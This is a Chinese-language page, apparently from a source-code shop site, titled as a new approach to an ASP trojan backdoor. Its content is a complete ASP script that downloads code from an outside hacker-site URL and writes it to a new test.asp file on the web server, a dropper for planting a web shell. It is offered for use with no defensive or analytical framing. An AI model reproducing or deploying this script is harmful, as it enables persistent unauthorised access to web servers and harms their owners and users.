源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

ASP木马后门新思路

  • 时间:2021-03-28 17:56 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:ASP木马后门新思路
<%   Function GetPage(url)   dim Retrieval   Set Retrieval = createObject("Microsoft.XMLHTTP")   With Retrieval   .Open "Get", url, False ', "", ""   .Send   GetPage = BytesToBstr(.ResponseBody)   End With   Set Retrieval = Nothing   End Function   Function BytesToBstr(body)   dim objstream   set objstream = Server.createObject("adodb.stream")   objstream.Type = 1   objstream.Mode =3   objstream.Open   objstream.Write body   objstream.Position = 0   objstream.Type = 2   objstream.Charset = "GB2312"   BytesToBstr = objstream.ReadText   objstream.Close   set objstream = nothing   End Function   on error resume next   Url="http://www.heibai.org/hacker/daemon.txt"   response.write "开始取得远程代码........"   wstr = GetPage(Url)   Set fs=Server.createObject("Scripting.FileSystemObject")   Set CrFi=fs.createTextFile(server.MapPath("./")&"\test.asp")   Crfi.Writeline(wstr)   set CrFi=nothing   set fs=nothing   response.write "...<font color=red>生成test.asp文件成功</font>"   %>  
  • 全部评论(0)
联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部